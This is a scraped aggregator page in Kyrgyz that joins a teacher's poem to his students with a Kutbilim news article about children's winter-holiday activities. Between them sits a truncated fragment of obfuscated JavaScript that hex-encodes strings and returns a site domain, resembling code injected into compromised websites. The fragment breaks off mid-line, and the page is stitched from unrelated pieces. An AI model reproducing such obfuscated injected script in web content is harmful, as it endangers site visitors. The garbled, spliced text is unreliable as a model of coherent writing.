Кечегүнкү камкордукту унутушуп,

Жан дүйнөнүн тынчын алып, бузушуп.

Ичи арамдын ити өлүп ичинде,

Башка дилди, башка динди тутушуп.

 

Кошоматчы, маңкурт сымал жан багаар,

Дагы кимиң – байлык берсе алданаар?!

Абийир таза, менден деги кетпеди,

Аман болсок мезгил элеп, такталаар.

 

Шакирттерим, куулук жолун ойлобо,

Өзүмчүлдүн  арамдыгын колдобо.

Бөлүп жарар, бузукулук көп болот,

“Бирөө айтат” – деп, отту кармап ойнобо!

 

Жан дүйнөдө дудук болуп көз көрбөй,

Бийлик берсе бир заматта өзгөрмөй.

Арамдыктын аягы кууш, жолу – адаш,

Турмушумда көптү көрдүм — өзгөрбөй.

 

Пенде болуп ачуум менен тийдимби,

Зордоп, кордоп мен Силерди ийдимби.

Баарыбызды Кудай турат калыстап,

Жолтоо болуп, артың түшүп – чийдимби?!

 

Адил болуу — өмүрдөгү максатым,

Илим жолун ар кимиңе такташтым.

Шакирттерим, ачык болсун жолуңар,

Элим үчүн илимиңер жактаттым.

 

Мезгил өтүп, Силер ээлеп устатты,

Күтөсүңөр кадыр-баркты, турпатты.

Доору менен кадамдатып илимди,

Милдетиңер тарбиялоо урпакты.

 

Кырк чоромдун – кырк мүнөзү ар кандай,

Бири түнт да, бири шайыр – ак маңдай.

Заман кыйын,  татаалдыктан тартынбай,

Умтулушат тоскоолдуктан жазганбай.

 

Байлыгым менин – шакирттерим ээрчиген,

Тагдырлары мен аркылуу чечилген.

Турмуш деген татаал жолдо келатат,

Кыркар тарткан кырк чородой сезилген.

 

 

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kutbilim.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Каникул кандай өтүүдө?

$
0
0

Жыл жаңыраар алдында КР Өкмөтүнүн жыйынында сүйлөгөн сөзүндө Кыргыз Республикасынын Премьер-министри Темир Сариев майрам күндөрүндөгү маданий-массалык иш-чаралардын коопсуз жана уюшкандыкта,ашыкча чыгымсыз өткөрүлүшүн жана ошондой эле кышкы каникул учурунда балдардын маданий эс алуусун туура уюштуруу милдетин койгон эле. Ага ылайык, борборубуздагы жана аймактардагы маданий эс алуу жайларында, спорт аянттарында балдар үчүн кызыктуу жомоктор, көңүл ачуучу оюн-зооктор жана спорт боюнча кызыктуу мелдештер кызуу башталды.

“Баламды кыргыз тили курсуна жаздык”

Балдардын кубанычына быйылкы кышкы эс алуусу бир айга чукул убакытка созулмай болду. Алардын каникулу ары пайдалуу, ары кызыктуу өтүшүнө албетте биринчи кезекте ата-энелер кызыкдар. Көңүлдүү эс алуу үчүн көңүлдөгүдөй каражат керек экендиги да талашсыз. Арийне, аны бардык эле ата-энелер көтөрө алышпайт. Алсак, каникулда алыскы жана жакынкы чет өлкөлөргө эс алууга балдарын атайын алып чыгышкан ата-энелер да жок эмес. Алардын катарына Айгүл аттуу айымды кошсок болот. Ал чет жактагы туугандарыныкына конокко баруу мезгилин атайын кызынын эс алуу учуруна жылдырган. Чакырууга жараша балким Москва шаарына же Египетке чыкканга даярданып жатышканын, бул күндү кызы чыдамсыздык менен күтүп жаткан кызы да экинчи чейректи жалаң бешке аяктап, апасын кубантканын айтат.

Каникул мезгилинде көңүл ачуу менен эле чектелбей, пайдалуу да өткөргүсү келген Нуриля айым балдарды бош койбой, сөзсүз кандайдыр бир иш менен алектендирүү керек деп эсептейт.

-         Албетте, бардык эле ата-эне балдары үчүн жагымдуу шарт түзүп берүүнү каалайт эмеспи. Бирок жагымдуу дегенде сөзсүз эле олчойтуп акча жумшоо керек эмес. Ашыкча чыгымды кыскартуу боюнча Премьер-министрибиз Темир Сариев абдан туура айтты. Айткандай эле акча-тыйыныбызды той-топурга жумшабай, балдарыбыздын туура билим алышына жумшасак, алда канча пайдалуу. Азыр кандай сонун мүмкүнчүлүктөр бар. Ар кимисин өз алына, жөндөмүнө жараша ийримдерге катыштырып, каражатыбызды балдарыбыздын билимин бекемдөөгө сарптаганыбыз туура. Мектеп курагындагы балдарды болсо жылы бою, бардык учурда түрдүү ийримдерге, секцияларга тартуу керек. Ал үчүн каникул мезгилин күтүүнүн зарылдыгы деле жок. Спорт ийримдери биринчиден, баланын ден соолугуна пайдалуу. Экинчиден, балдар колоктоп бош жүрбөй, энергиясын туура жумшаганга үйрөнүшөт. Ал эми тил үйрөтүүчү курстардын пайдасы тууралуу айтуунун зарылдыгы деле жок болуш керек.

Маселен, мен баламды теннис ийримине жаздырып койгом. Жумасына үч жолу барып, өзү теңдүү балдар менен машыгып, дене боюн жазып келет. Болбосо, сабактан келгенден тартып компьютерге үңүлүп же болбос кол телефонун чукулап отурганын көрүп зээним кейийт – деп, биз менен ой бөлүштү.

Ал эми Бишкек шаарындагы орус тилдүү мектептин биринде 8-класста окуган уулу эки чейректе тең кыргыз тилинен жакшы баа алалбай кыйналгандыгын эске алган Айым аттуу эне, аны кышкы каникулда кыргыз тили курсуна жаздырган.

-         Балабыз орус тилдүү мектепте окугандыктан, кыргыз тилинен кыйналып калууда. Үйдө биз мүмкүн болушунча кыргыз тилинде сүйлөшкөнгө аракеттенебиз. Бирок сабагынан көбүрөөк жардам берүүгө убактыбыз жетпейт. Андыктан каникул мезгилдеринде убакыттарына карап, балдарыбызды курстарга беребиз. Кышкы каникулда балабыздын кыргыз тили боюнча билимин бекемдейли деген максатта кыргыз тили курсунда окута баштадык. Эс алуу учурунда да окудум деп капа болбошу үчүн тоого лыжа тебүүгө алып чыгабыз деп убада бердик, — дейт Айым.

Шамал менен жарышып чана тебишет

КР Президенти Алмазбек Атамбаевдин жарлыгы менен 2016-жыл -“Тарых жана маданият жылы”  деп жарыяланбадыбы. Бул жылы балдар үчүн да ыңгайлуу кырдаал түзүлөөрү шексиз. Републикабыздын бардык аймактарында, анын ичинде билим берүү, илим жана маданият мекемелеринде  Кыргызстан тарыхын жана маданиятын окуп-изилдөө жана жайылтуу ж.б. иш-пландары каралууда.

Балдардын кышкы каникул мезгилин уюшкандыкта өткөрүү иш-планын Кемин райондук билим берүү бөлүмү алдын-ала даярдап, райондогу мектеп директорлоруна тараткан. Райондун билим берүү бөлүмүнүн башчысы Зина Алиева бизге билдиргендей, окуучулардын дээрлик бир айлык эс алуусун кантип уюшкандыкта жана пайдалуу өткөрүү керектиги тууралуу педжамааттар менен биргеликте түзүшкөн. Ал программанын алкагында окуучулар эс алууда бекер жатпай элдик оозеки чыгармалар боюнча билимин сынашып “Өнөр алды кызыл тил” кароо-сынагын өткөрүшөт. Кышкы каникул чана, коньки тебүү сыяктуу көңүл көтөргөн оюндарсыз кантип өтсүн, андыктан балдар топ-тобу менен тоону көздөй чана сүйрөп жөнөшсө, ылдый карай зуулдатып лыжа тебишээри турган иш. Тоолуу аймактын кыш мезгилинде ойнолуучу оюндарын кыргыздын улуттук оюндары толуктамакчы.

Каникулда корей тилин окушат

Дээрлик бир айга созулган балдардын эс алуусу пайдалуу өтүүсү үчүн кышкы лагерлер уюштурулууда. Алардын бири 6-январда Чүй облусунун Аламүдүн районундагы колдоого муктаж үй-бүлөлөрдөгү өзгөчө зээндүү балдардын мектеп-гимназиясында корей тилин үйрөтүүчү класс ачылды.

Бишкек шаарындагы корей борборунун колдоосу менен уюшулган лагердин ачылышына борбордун директору Ли Ен Хунг, Сеул улуттук университетинин студенттери жана Талас өрөөнүнөн келишкен 20дан ашык чет тилдерди үйрөнгөн окуучулар катышты.

Мектеп-гимназиянын директору Бүбүкан Жусупованын айтымында, аталган борбор өзүнчө бир классты тийиштүү жабдуулар менен жабдып берген.

-         Акыркы жылдары алыскы жана жакынкы чет мамлекеттерге барып иштеп, окуп жатышкан жаштарыбыз көбөйүүдө. Кореяга да ошондой максатта чыгып жатышкандар арбын. Ал үчүн биринчи кезекте тил үйрөнүү зарыл экендиги талашсыз. Ошондой тил үйрөнүү мүмкүнчүлүгү биздин балдар үчүн түзүлүп жаткандыгына кубанычтабыз. Кыргызстандагы Корей тили борборунун жетекчилиги биздин мектеп-гимназиянын базасында атайын бир класс ачып, аны керектүү эмеректер жана окуу колдонмолору менен жабдып берди, — дейт директор.

Бул тил үйрөнүү мөөнөтү 6-январдан 16-январга чейин созулмакчы. Мындан тышкары балдар каникул учурунда корей тили сыяктуу ар түрдүү тил үйрөтүүчү курстарга барышып, окуучулар үчүн атайын уюштурулган оюн-концерттерге катыша алышат.

Айнагүл Кашыбаева,

“Кутбилим”

 

Viewing all 382 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>